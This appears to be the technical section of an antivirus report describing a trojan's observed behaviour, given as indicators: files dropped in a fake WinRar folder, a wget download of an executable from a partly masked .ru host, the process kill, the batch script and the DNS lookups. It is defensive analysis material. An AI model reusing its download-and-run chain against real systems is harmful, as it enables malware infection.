Техническая информация
- '%PROGRAM_FILES%\Copyright\WinRar\torrent29.exe'
- '%PROGRAM_FILES%\Copyright\WinRar\wget.exe' http://za###alka.ru/35606/torrent29.exe
- '%PROGRAM_FILES%\Copyright\WinRar\torrent29.exe' (загружен из сети Интернет)
- '<SYSTEM32>\ping.exe' ya.ru -n 5
- '<SYSTEM32>\taskkill.exe' /f /im winupd.exe
- '<SYSTEM32>\cmd.exe' /c ""%PROGRAM_FILES%\Copyright\WinRar\winupd.bat" "
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %PROGRAM_FILES%\Copyright\WinRar\WinRar.rar
- %PROGRAM_FILES%\Copyright\WinRar\WinRar.rar
- %PROGRAM_FILES%\Copyright\WinRar\winupd.bat
- %PROGRAM_FILES%\Copyright\WinRar\torrent29.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %PROGRAM_FILES%\Copyright\WinRar\wget.exe
- %TEMP%\$inst\2.tmp
- %PROGRAM_FILES%\Copyright\WinRar\wget.exe
- %TEMP%\$inst\temp_0.tmp
- 'za###alka.ru':80
- za###alka.ru/35606/torrent29.exe
- DNS ASK za###alka.ru
- DNS ASK ya.ru
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'